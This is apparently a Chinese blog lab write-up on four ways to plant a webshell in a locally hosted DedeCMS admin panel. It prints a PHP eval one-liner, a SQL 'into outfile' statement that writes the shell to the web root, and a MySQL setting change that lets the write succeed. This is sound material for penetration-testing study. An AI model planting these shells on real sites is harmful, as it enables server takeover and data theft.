常见cms漏洞之dedecms

        DedeCMS是织梦团队开发PHP 网站管理系统，它以简单、易用、高效为特色，组建出各种各样各具特色的网站，如地方门户、行业门户、政府及企事业站点等。

        下载地址请网上自行寻找

        搭建方式选择php study

首先搭建环境

#前台http://localhost/dedecms/index.php?upcache=1
#后台http://localhost/dedecms/dede/
admin123是我注册的用户名密码

方法一、通过文件管理器上传WebShell

登陆到后台点击【核心】--》 【文件式管理器】--》【文件上传】 将准备好的一句话代码上传....OK

<?php phpinfo();eval($_POST['cmd']);?>

访问 使用冰蝎吧

 

链接成功

方法二、直接修改模板拿WebShel..点击【模板】--》【默认模板管理】-->【index.htm】-->【修改】在文件修改中添加一句话代码

        点击【生成】--》【更新主页HTML】--》将主页位置修改为【./index.php】--》点击 【生成静态】--》点击 【更新主页】  再次访问站点首页可发现变化.….

链接成功

方法三、后台任意命令执行拿WebShell

        点击 【模块】--》「【广告管理】--》 【增加一个新广告】--》在【广告内容】 处添加一句话代码--》点击 【确定】

点击【代码】--》在图中显示的路径与站点进行拼接.…访问测试!

文件存在，尝试连接，一开始连不上，把代码中phpinfo去了，只剩下木马即可连接成功

方法四 sql命令行植入

位于系统-sql命令行工具-写入代码

select  "<?php phpinfo();@eval($_POST[cmd]);" into outfile "C:/phpstudy_pro/WWW/uploads/999.php" 

应该是访问即可，但博主的实验中文件没有生成成功，中午了，博主吃饭去了，如果下午想起来可以再试试

下午回来了，经过查验得知

mysql 里的my.ini中添加一行

secure_file_priv=''这样才能写入sql语句成功